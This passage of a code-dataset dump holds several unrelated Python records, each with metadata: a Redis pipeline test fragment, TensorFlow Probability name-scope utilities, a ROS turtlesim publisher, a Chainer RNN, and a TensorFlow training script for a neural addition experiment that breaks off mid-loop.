pipe.hgetall('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [
True,
True,
{'bar': 'aaa', 'zar': 'bbb'}
])
self.stop()
@async_test
@gen.engine
def test_pipe_hsets2(self):
pipe = self.client.pipeline(transactional=False)
pipe.hset('foo', 'bar', 'aaa')
pipe.hset('foo', 'zar', 'bbb')
pipe.hgetall('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [
True,
True,
{'bar': 'aaa', 'zar': 'bbb'}
])
self.stop()
@async_test
@gen.engine
def test_response_error(self):
res = yield gen.Task(self.client.set, 'foo', 'bar')
self.assertTrue(res)
res = yield gen.Task(self.client.llen, 'foo')
self.assertIsInstance(res, ResponseError)
self.stop()
|
ru
| 0.26433
|
#!/usr/bin/env python
| 2.320764
| 2
|
tensorflow_probability/python/internal/name_util.py
|
Frightera/probability
| 1
|
6627556
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Utility functions for dealing with `tf.name_scope` names."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import re
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
__all__ = [
'camel_to_lower_snake',
'get_name_scope_name',
'instance_scope'
]
_IN_INSTANCE_SCOPE = False
_valid_chars_re = re.compile(r'[^a-zA-Z0-9_]+')
_camel_snake_re = re.compile(r'((?<=[a-z0-9])[A-Z]|(?!^)(?<!_)[A-Z](?=[a-z]))')
def strip_invalid_chars(name):
return re.sub(_valid_chars_re, r'_', name).strip('_') if name else ''
def camel_to_lower_snake(name):
return (re.sub(_camel_snake_re, r'_\1', name).lower()
if name else '')
def get_name_scope_name(name):
"""Returns the input name as a unique `tf.name_scope` name."""
if name and name[-1] == '/':
return name
name = strip_invalid_chars(name)
with tf.name_scope(name) as unique_name:
pass
return unique_name
@contextlib.contextmanager
def instance_scope(instance_name, constructor_name_scope):
"""Constructs a name scope for methods of a distribution (etc.) instance."""
global _IN_INSTANCE_SCOPE
with tf.name_scope(_instance_scope_name(instance_name,
constructor_name_scope)
) as name_scope:
was_in_instance_scope = _IN_INSTANCE_SCOPE
_IN_INSTANCE_SCOPE = True
try:
yield name_scope
finally:
_IN_INSTANCE_SCOPE = was_in_instance_scope
def _instance_scope_name(instance_name, constructor_name_scope):
"""Specifies a name scope for methods of a distribution (etc.) instance."""
global _IN_INSTANCE_SCOPE
current_parent_scope = _get_parent_scope(_name_scope_dry_run(instance_name))
constructor_parent_scope = _get_parent_scope(constructor_name_scope)
if current_parent_scope == constructor_parent_scope:
# Reuse initial scope.
return constructor_name_scope
if _IN_INSTANCE_SCOPE:
# Elide the constructor scope annotation when we're inside a method of a
# higher-level distribution (which should itself have annotated its
# constructor scope).
constructor_scope_annotation = ''
else:
# Otherwise, include a reference to the sanitized constructor scope.
constructor_scope_annotation = (
'_CONSTRUCTED_AT_' + (strip_invalid_chars(constructor_parent_scope[:-1])
if constructor_parent_scope[:-1]
else 'top_level'))
return (current_parent_scope +
instance_name +
constructor_scope_annotation + '/')
def _get_parent_scope(scope):
"""Removes the final leaf from a scope (`a/b/c/` -> `a/b/`)."""
parts = scope.split('/')
return '/'.join(parts[:-2] + parts[-1:])
def _name_scope_dry_run(name):
"""Constructs a scope like `tf.name_scope` but without marking it used."""
if tf.executing_eagerly():
# Names in eager mode are not unique, so we can just invoke name_scope
# directly.
with tf.name_scope(name) as name_scope:
return name_scope
graph = tf1.get_default_graph()
if not name:
name = ''
elif name[-1] != '/':
name = graph.unique_name(name, mark_as_used=False) + '/'
return name
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Utility functions for dealing with `tf.name_scope` names."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import re
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
__all__ = [
'camel_to_lower_snake',
'get_name_scope_name',
'instance_scope'
]
_IN_INSTANCE_SCOPE = False
_valid_chars_re = re.compile(r'[^a-zA-Z0-9_]+')
_camel_snake_re = re.compile(r'((?<=[a-z0-9])[A-Z]|(?!^)(?<!_)[A-Z](?=[a-z]))')
def strip_invalid_chars(name):
return re.sub(_valid_chars_re, r'_', name).strip('_') if name else ''
def camel_to_lower_snake(name):
return (re.sub(_camel_snake_re, r'_\1', name).lower()
if name else '')
def get_name_scope_name(name):
"""Returns the input name as a unique `tf.name_scope` name."""
if name and name[-1] == '/':
return name
name = strip_invalid_chars(name)
with tf.name_scope(name) as unique_name:
pass
return unique_name
@contextlib.contextmanager
def instance_scope(instance_name, constructor_name_scope):
"""Constructs a name scope for methods of a distribution (etc.) instance."""
global _IN_INSTANCE_SCOPE
with tf.name_scope(_instance_scope_name(instance_name,
constructor_name_scope)
) as name_scope:
was_in_instance_scope = _IN_INSTANCE_SCOPE
_IN_INSTANCE_SCOPE = True
try:
yield name_scope
finally:
_IN_INSTANCE_SCOPE = was_in_instance_scope
def _instance_scope_name(instance_name, constructor_name_scope):
"""Specifies a name scope for methods of a distribution (etc.) instance."""
global _IN_INSTANCE_SCOPE
current_parent_scope = _get_parent_scope(_name_scope_dry_run(instance_name))
constructor_parent_scope = _get_parent_scope(constructor_name_scope)
if current_parent_scope == constructor_parent_scope:
# Reuse initial scope.
return constructor_name_scope
if _IN_INSTANCE_SCOPE:
# Elide the constructor scope annotation when we're inside a method of a
# higher-level distribution (which should itself have annotated its
# constructor scope).
constructor_scope_annotation = ''
else:
# Otherwise, include a reference to the sanitized constructor scope.
constructor_scope_annotation = (
'_CONSTRUCTED_AT_' + (strip_invalid_chars(constructor_parent_scope[:-1])
if constructor_parent_scope[:-1]
else 'top_level'))
return (current_parent_scope +
instance_name +
constructor_scope_annotation + '/')
def _get_parent_scope(scope):
"""Removes the final leaf from a scope (`a/b/c/` -> `a/b/`)."""
parts = scope.split('/')
return '/'.join(parts[:-2] + parts[-1:])
def _name_scope_dry_run(name):
"""Constructs a scope like `tf.name_scope` but without marking it used."""
if tf.executing_eagerly():
# Names in eager mode are not unique, so we can just invoke name_scope
# directly.
with tf.name_scope(name) as name_scope:
return name_scope
graph = tf1.get_default_graph()
if not name:
name = ''
elif name[-1] != '/':
name = graph.unique_name(name, mark_as_used=False) + '/'
return name
|
en
| 0.830723
|
# Copyright 2018 The TensorFlow Probability Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ Utility functions for dealing with `tf.name_scope` names. Returns the input name as a unique `tf.name_scope` name. Constructs a name scope for methods of a distribution (etc.) instance. Specifies a name scope for methods of a distribution (etc.) instance. # Reuse initial scope. # Elide the constructor scope annotation when we're inside a method of a # higher-level distribution (which should itself have annotated its # constructor scope). # Otherwise, include a reference to the sanitized constructor scope. Removes the final leaf from a scope (`a/b/c/` -> `a/b/`). Constructs a scope like `tf.name_scope` but without marking it used. # Names in eager mode are not unique, so we can just invoke name_scope # directly.
| 2.131526
| 2
|
melodic/lib/turtle_tf/turtle_tf_message_broadcaster.py
|
Dieptranivsr/Ros_Diep
| 2
|
6627557
|
<reponame>Dieptranivsr/Ros_Diep<filename>melodic/lib/turtle_tf/turtle_tf_message_broadcaster.py
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the <NAME> nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#!/usr/bin/env python
import rospy
import turtlesim.msg
import geometry_msgs.msg
import turtlesim.srv
from geometry_msgs.msg import PointStamped, Point
from std_msgs.msg import Header
class PointPublisher:
def handle_turtle_pose(self, msg, turtlename):
self.pub.publish(PointStamped(Header(0, rospy.rostime.get_rostime(), "/world"), Point(msg.x, msg.y, 0)))
def __init__(self):
self.turtlename = "turtle3" # rospy.get_param('~turtle')
self.sub = rospy.Subscriber('/%s/pose' % self.turtlename,
turtlesim.msg.Pose,
self.handle_turtle_pose,
self.turtlename)
self.pub = rospy.Publisher('turtle_point_stamped', PointStamped, queue_size=1)
if __name__ == '__main__':
rospy.init_node('tf_turtle_stamped_msg_publisher')
rospy.wait_for_service('spawn')
spawner = rospy.ServiceProxy('spawn', turtlesim.srv.Spawn)
spawner(4, 2, 0, 'turtle3')
pp = PointPublisher()
pub = rospy.Publisher("turtle3/cmd_vel", geometry_msgs.msg.Twist, queue_size=1)
while not rospy.is_shutdown():
msg = geometry_msgs.msg.Twist()
msg.linear.x = 1
msg.angular.z = 1
pub.publish(msg)
rospy.sleep(rospy.Duration(0.1))
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the <NAME> nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#!/usr/bin/env python
import rospy
import turtlesim.msg
import geometry_msgs.msg
import turtlesim.srv
from geometry_msgs.msg import PointStamped, Point
from std_msgs.msg import Header
class PointPublisher:
def handle_turtle_pose(self, msg, turtlename):
self.pub.publish(PointStamped(Header(0, rospy.rostime.get_rostime(), "/world"), Point(msg.x, msg.y, 0)))
def __init__(self):
self.turtlename = "turtle3" # rospy.get_param('~turtle')
self.sub = rospy.Subscriber('/%s/pose' % self.turtlename,
turtlesim.msg.Pose,
self.handle_turtle_pose,
self.turtlename)
self.pub = rospy.Publisher('turtle_point_stamped', PointStamped, queue_size=1)
if __name__ == '__main__':
rospy.init_node('tf_turtle_stamped_msg_publisher')
rospy.wait_for_service('spawn')
spawner = rospy.ServiceProxy('spawn', turtlesim.srv.Spawn)
spawner(4, 2, 0, 'turtle3')
pp = PointPublisher()
pub = rospy.Publisher("turtle3/cmd_vel", geometry_msgs.msg.Twist, queue_size=1)
while not rospy.is_shutdown():
msg = geometry_msgs.msg.Twist()
msg.linear.x = 1
msg.angular.z = 1
pub.publish(msg)
rospy.sleep(rospy.Duration(0.1))
|
en
| 0.696197
|
#!/usr/bin/env python # Software License Agreement (BSD License) # # Copyright (c) 2008, <NAME>, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of the <NAME> nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. #!/usr/bin/env python # rospy.get_param('~turtle')
| 1.756127
| 2
|
src/05_ptb_rnn/RNN.py
|
corochann/deep-learning-tutorial-with-chainer
| 31
|
6627558
|
import chainer
import chainer.functions as F
import chainer.links as L
class RNN(chainer.Chain):
"""Simple Recurrent Neural Network implementation"""
def __init__(self, n_vocab, n_units):
super(RNN, self).__init__()
with self.init_scope():
self.embed = L.EmbedID(n_vocab, n_units)
self.l1 = L.Linear(n_units, n_units)
self.r1 = L.Linear(n_units, n_units)
self.l2 = L.Linear(n_units, n_vocab)
self.recurrent_h = None
def reset_state(self):
self.recurrent_h = None
def __call__(self, x):
h = self.embed(x)
if self.recurrent_h is None:
self.recurrent_h = F.tanh(self.l1(h))
else:
self.recurrent_h = F.tanh(self.l1(h) + self.r1(self.recurrent_h))
y = self.l2(self.recurrent_h)
return y
|
import chainer
import chainer.functions as F
import chainer.links as L
class RNN(chainer.Chain):
"""Simple Recurrent Neural Network implementation"""
def __init__(self, n_vocab, n_units):
super(RNN, self).__init__()
with self.init_scope():
self.embed = L.EmbedID(n_vocab, n_units)
self.l1 = L.Linear(n_units, n_units)
self.r1 = L.Linear(n_units, n_units)
self.l2 = L.Linear(n_units, n_vocab)
self.recurrent_h = None
def reset_state(self):
self.recurrent_h = None
def __call__(self, x):
h = self.embed(x)
if self.recurrent_h is None:
self.recurrent_h = F.tanh(self.l1(h))
else:
self.recurrent_h = F.tanh(self.l1(h) + self.r1(self.recurrent_h))
y = self.l2(self.recurrent_h)
return y
|
en
| 0.577915
|
Simple Recurrent Neural Network implementation
| 3.43484
| 3
|
experiments/add/add.py
|
namin/d4
| 42
|
6627559
|
<filename>experiments/add/add.py<gh_stars>10-100
from collections import namedtuple
import numpy as np
import tensorflow as tf
from experiments.nam_seq2seq import NAMSeq2Seq
from experiments.data import load_data, DatasetBatcher
# logging.basicConfig(level=logging.DEBUG)
np.set_printoptions(linewidth=20000, precision=2, suppress=True, threshold=np.nan)
# num_steps = seq_length * 6 + 6
# stack_size = seq_length * 2 + 10
#
# seq_len = 1
# num_steps = 12
# stack_size = 12
# seq_length = 3
# num_steps = 24
# stack_size = 16
# seq_length = 10
# num_steps = 66
# stack_size = 30
SUMMARY_LOG_DIR = "./tmp/add/summaries"
# choose add - learning rate 0.05
tf.app.flags.DEFINE_integer("batch_size", 128, "Batch size")
tf.app.flags.DEFINE_float("learning_rate", 0.01, "Learning rate")
tf.app.flags.DEFINE_integer("train_num_steps", -1, "Training phase - number of steps")
tf.app.flags.DEFINE_integer("train_stack_size", -1, "Training phase - stack size")
tf.app.flags.DEFINE_integer("test_num_steps", -1, "Testing phase - number of steps")
tf.app.flags.DEFINE_integer("test_stack_size", -1, "Testing phase - stack size")
tf.app.flags.DEFINE_integer("min_return_width", 5, "Minimum return width")
tf.app.flags.DEFINE_integer("eval_every", 5, "Evaluate every n-th step")
tf.app.flags.DEFINE_integer("max_epochs", 1000, "Maximum number of epochs")
tf.app.flags.DEFINE_string("id", "x", "unique id for summary purposes")
tf.app.flags.DEFINE_float("init_weight_stddev", 0.1, "Standard deviation for initial weights")
tf.app.flags.DEFINE_float("max_grad_norm", 1.0, "Clip gradients to this norm.")
tf.app.flags.DEFINE_float("grad_noise_eta", 0.01, "Gradient noise scale.")
tf.app.flags.DEFINE_float("grad_noise_gamma", 0.55, "Gradient noise gamma.")
tf.app.flags.DEFINE_string("dataset",
"data/add/train_len/train1_test4",
"unique id for summary purposes")
tf.app.flags.DEFINE_string("sketch", "adder_choose", "sketch")
tf.app.flags.DEFINE_boolean("save_summary", True, "Save summary files.")
def print_flags(flags):
print("Flag values")
for k, v in flags.__dict__['__flags'].items():
print(' ', k, ':', v)
FLAGS = tf.app.flags.FLAGS
d4InitParams = namedtuple(
"d4InitParams", "stack_size value_size batch_size min_return_width init_weight_stddev")
TrainParams = namedtuple(
"TrainParams", "train learning_rate num_steps max_grad_norm grad_noise_eta grad_noise_gamma")
TestParams = namedtuple("TestParams", "stack_size num_steps")
def main(_):
dataset_path = FLAGS.dataset
datasets = load_data(dataset_path)
print('dataset path:', dataset_path)
def load_scaffold_from_file(filename):
with open(filename, "r") as f:
scaffold = f.read()
return scaffold
sketch = load_scaffold_from_file(FLAGS.sketch)
# calculate value_size automatically
value_size = max(datasets.train.input_seq.max(), datasets.train.target_seq.max(),
datasets.dev.input_seq.max(), datasets.dev.target_seq.max(),
datasets.test.input_seq.max(), datasets.test.target_seq.max(),
datasets.debug.input_seq.max(), datasets.debug.target_seq.max()) + 2
print('value_size', value_size)
dataset_train = datasets.train
dataset_dev = datasets.dev
dataset_test = datasets.test
train_batcher = DatasetBatcher(dataset_train, FLAGS.batch_size)
train_seq_len = dataset_train.input_seq[:, -1].max()
test_seq_len = dataset_test.input_seq[:, -1].max()
dev_seq_len = dataset_dev.input_seq[:, -1].max()
train_num_steps = train_seq_len * 8 + 6
test_num_steps = test_seq_len * 8 + 6
dev_num_steps = dev_seq_len * 8 + 6
train_stack_size = train_seq_len * 3 + 10
test_stack_size = test_seq_len * 3 + 10
FLAGS.train_num_steps = (train_num_steps if FLAGS.train_num_steps == -1
else FLAGS.train_num_steps)
FLAGS.train_stack_size = (train_stack_size if FLAGS.train_stack_size == -1
else FLAGS.train_stack_size)
FLAGS.test_num_steps = (test_num_steps if FLAGS.test_num_steps == -1
else FLAGS.test_num_steps)
FLAGS.test_stack_size = (test_stack_size if FLAGS.test_stack_size == -1
else FLAGS.test_stack_size)
print('--')
print(' train_seq_len', train_seq_len)
print(' test_seq_len', test_seq_len)
print('--')
print_flags(FLAGS)
print('-' * 20)
d4_params = d4InitParams(stack_size=FLAGS.train_stack_size,
value_size=value_size,
batch_size=FLAGS.batch_size,
min_return_width=FLAGS.min_return_width,
init_weight_stddev=FLAGS.init_weight_stddev
)
train_params = TrainParams(train=True,
learning_rate=FLAGS.learning_rate,
num_steps=FLAGS.train_num_steps,
max_grad_norm=FLAGS.max_grad_norm,
grad_noise_eta=FLAGS.grad_noise_eta,
grad_noise_gamma=FLAGS.grad_noise_gamma
)
test_params = TestParams(num_steps=FLAGS.test_num_steps,
stack_size=FLAGS.test_stack_size
)
model = NAMSeq2Seq(sketch, d4_params, train_params, test_params,
debug=False,
adjust_min_return_width=True,
argmax_pointers=True,
argmax_stacks=True,
)
model.build_graph()
# with tf.Session() as sess:
# model.load_model(sess, "./tmp/add/checkpoints/{0}/".format(FLAGS.id))
# print('tst')
# # dataset_test = load_single_dataset('./data/add/{0}/test.txt'.format(FLAGS.id))
# def num_steps(x):
# return x * 8 + 6
#
# accuracy, partial_accuracy = model.run_eval_step(
# sess, dataset_test, num_steps(dataset_test.input_seq[:, -1]. max()))
# print("{0}\t{1}\t{2}".format('test', accuracy, partial_accuracy))
#
# exit(0)
# where to save checkpoints for test set calculation
directory_save = "./tmp/add/checkpoints/{0}/".format(FLAGS.id)
# directory_save needs to exist
import os
if not os.path.exists(directory_save):
os.makedirs(directory_save)
best = 0.0
with tf.Session() as sess:
summary_writer = tf.train.SummaryWriter(SUMMARY_LOG_DIR + "/" + FLAGS.id,
tf.get_default_graph())
sess.run(tf.initialize_all_variables())
# run max_epochs times
print("epoch\titer\tloss\taccuracy\tpartial accuracy")
stop_early = False
epoch = 0
while epoch < FLAGS.max_epochs and (not stop_early):
epoch += 1
total_loss = 0.0
for i in range(train_batcher._batch_number):
batch = train_batcher.next_batch()
_, loss, summaries, global_step = model.run_train_step(sess, batch, epoch)
summary_writer.add_summary(summaries, global_step)
total_loss += loss
loss_per_epoch = total_loss / (train_batcher._batch_number * train_batcher._batch_size)
print("train\t{0}\tl:{1}\t\t".format(epoch, loss_per_epoch))
if epoch % FLAGS.eval_every == 0:
accuracy, partial_accuracy = model.run_eval_step(sess, dataset_dev, dev_num_steps)
print("dev\t{0}\ta:{1}\tpa:{2}".format(epoch, accuracy, partial_accuracy))
if partial_accuracy > best:
model.save_model(sess, directory_save + "model.checkpoint",
global_step=global_step)
best = partial_accuracy
if partial_accuracy == 1.0:
_acc, _p_acc = model.run_eval_step(sess, dataset_test, test_num_steps)
print("test\t{0}\ta:{1}\tpa:{2}".format(epoch, _acc, _p_acc))
exit(0)
# accuracy, partial_accuracy = model.run_eval_step(
# sess, datasets.test, test_stack_size)
# print("test {0}\t{1}\t{2}\t{3}".format(epoch, 'x', accuracy, partial_accuracy))
summary_acc = tf.Summary(
value=[tf.Summary.Value(tag="accuracy/accuracy", simple_value=accuracy)])
summary_part_acc = tf.Summary(
value=[tf.Summary.Value(tag="accuracy/partial_accuracy",
simple_value=partial_accuracy)])
summary_writer.add_summary(summary_acc, global_step)
summary_writer.add_summary(summary_part_acc, global_step)
summary_writer.flush()
if __name__ == "__main__":
tf.app.run()
|
<filename>experiments/add/add.py<gh_stars>10-100
from collections import namedtuple
import numpy as np
import tensorflow as tf
from experiments.nam_seq2seq import NAMSeq2Seq
from experiments.data import load_data, DatasetBatcher
# logging.basicConfig(level=logging.DEBUG)
np.set_printoptions(linewidth=20000, precision=2, suppress=True, threshold=np.nan)
# num_steps = seq_length * 6 + 6
# stack_size = seq_length * 2 + 10
#
# seq_len = 1
# num_steps = 12
# stack_size = 12
# seq_length = 3
# num_steps = 24
# stack_size = 16
# seq_length = 10
# num_steps = 66
# stack_size = 30
SUMMARY_LOG_DIR = "./tmp/add/summaries"
# choose add - learning rate 0.05
tf.app.flags.DEFINE_integer("batch_size", 128, "Batch size")
tf.app.flags.DEFINE_float("learning_rate", 0.01, "Learning rate")
tf.app.flags.DEFINE_integer("train_num_steps", -1, "Training phase - number of steps")
tf.app.flags.DEFINE_integer("train_stack_size", -1, "Training phase - stack size")
tf.app.flags.DEFINE_integer("test_num_steps", -1, "Testing phase - number of steps")
tf.app.flags.DEFINE_integer("test_stack_size", -1, "Testing phase - stack size")
tf.app.flags.DEFINE_integer("min_return_width", 5, "Minimum return width")
tf.app.flags.DEFINE_integer("eval_every", 5, "Evaluate every n-th step")
tf.app.flags.DEFINE_integer("max_epochs", 1000, "Maximum number of epochs")
tf.app.flags.DEFINE_string("id", "x", "unique id for summary purposes")
tf.app.flags.DEFINE_float("init_weight_stddev", 0.1, "Standard deviation for initial weights")
tf.app.flags.DEFINE_float("max_grad_norm", 1.0, "Clip gradients to this norm.")
tf.app.flags.DEFINE_float("grad_noise_eta", 0.01, "Gradient noise scale.")
tf.app.flags.DEFINE_float("grad_noise_gamma", 0.55, "Gradient noise gamma.")
tf.app.flags.DEFINE_string("dataset",
"data/add/train_len/train1_test4",
"unique id for summary purposes")
tf.app.flags.DEFINE_string("sketch", "adder_choose", "sketch")
tf.app.flags.DEFINE_boolean("save_summary", True, "Save summary files.")
def print_flags(flags):
print("Flag values")
for k, v in flags.__dict__['__flags'].items():
print(' ', k, ':', v)
FLAGS = tf.app.flags.FLAGS
d4InitParams = namedtuple(
"d4InitParams", "stack_size value_size batch_size min_return_width init_weight_stddev")
TrainParams = namedtuple(
"TrainParams", "train learning_rate num_steps max_grad_norm grad_noise_eta grad_noise_gamma")
TestParams = namedtuple("TestParams", "stack_size num_steps")
def main(_):
dataset_path = FLAGS.dataset
datasets = load_data(dataset_path)
print('dataset path:', dataset_path)
def load_scaffold_from_file(filename):
with open(filename, "r") as f:
scaffold = f.read()
return scaffold
sketch = load_scaffold_from_file(FLAGS.sketch)
# calculate value_size automatically
value_size = max(datasets.train.input_seq.max(), datasets.train.target_seq.max(),
datasets.dev.input_seq.max(), datasets.dev.target_seq.max(),
datasets.test.input_seq.max(), datasets.test.target_seq.max(),
datasets.debug.input_seq.max(), datasets.debug.target_seq.max()) + 2
print('value_size', value_size)
dataset_train = datasets.train
dataset_dev = datasets.dev
dataset_test = datasets.test
train_batcher = DatasetBatcher(dataset_train, FLAGS.batch_size)
train_seq_len = dataset_train.input_seq[:, -1].max()
test_seq_len = dataset_test.input_seq[:, -1].max()
dev_seq_len = dataset_dev.input_seq[:, -1].max()
train_num_steps = train_seq_len * 8 + 6
test_num_steps = test_seq_len * 8 + 6
dev_num_steps = dev_seq_len * 8 + 6
train_stack_size = train_seq_len * 3 + 10
test_stack_size = test_seq_len * 3 + 10
FLAGS.train_num_steps = (train_num_steps if FLAGS.train_num_steps == -1
else FLAGS.train_num_steps)
FLAGS.train_stack_size = (train_stack_size if FLAGS.train_stack_size == -1
else FLAGS.train_stack_size)
FLAGS.test_num_steps = (test_num_steps if FLAGS.test_num_steps == -1
else FLAGS.test_num_steps)
FLAGS.test_stack_size = (test_stack_size if FLAGS.test_stack_size == -1
else FLAGS.test_stack_size)
print('--')
print(' train_seq_len', train_seq_len)
print(' test_seq_len', test_seq_len)
print('--')
print_flags(FLAGS)
print('-' * 20)
d4_params = d4InitParams(stack_size=FLAGS.train_stack_size,
value_size=value_size,
batch_size=FLAGS.batch_size,
min_return_width=FLAGS.min_return_width,
init_weight_stddev=FLAGS.init_weight_stddev
)
train_params = TrainParams(train=True,
learning_rate=FLAGS.learning_rate,
num_steps=FLAGS.train_num_steps,
max_grad_norm=FLAGS.max_grad_norm,
grad_noise_eta=FLAGS.grad_noise_eta,
grad_noise_gamma=FLAGS.grad_noise_gamma
)
test_params = TestParams(num_steps=FLAGS.test_num_steps,
stack_size=FLAGS.test_stack_size
)
model = NAMSeq2Seq(sketch, d4_params, train_params, test_params,
debug=False,
adjust_min_return_width=True,
argmax_pointers=True,
argmax_stacks=True,
)
model.build_graph()
# with tf.Session() as sess:
# model.load_model(sess, "./tmp/add/checkpoints/{0}/".format(FLAGS.id))
# print('tst')
# # dataset_test = load_single_dataset('./data/add/{0}/test.txt'.format(FLAGS.id))
# def num_steps(x):
# return x * 8 + 6
#
# accuracy, partial_accuracy = model.run_eval_step(
# sess, dataset_test, num_steps(dataset_test.input_seq[:, -1]. max()))
# print("{0}\t{1}\t{2}".format('test', accuracy, partial_accuracy))
#
# exit(0)
# where to save checkpoints for test set calculation
directory_save = "./tmp/add/checkpoints/{0}/".format(FLAGS.id)
# directory_save needs to exist
import os
if not os.path.exists(directory_save):
os.makedirs(directory_save)
best = 0.0
with tf.Session() as sess:
summary_writer = tf.train.SummaryWriter(SUMMARY_LOG_DIR + "/" + FLAGS.id,
tf.get_default_graph())
sess.run(tf.initialize_all_variables())
# run max_epochs times
print("epoch\titer\tloss\taccuracy\tpartial accuracy")
stop_early = False
epoch = 0
while epoch < FLAGS.max_epochs and (not stop_early):
epoch += 1
total_loss = 0.0
for i in range(train_batcher._batch_number):
batch = train_batcher.next_batch()
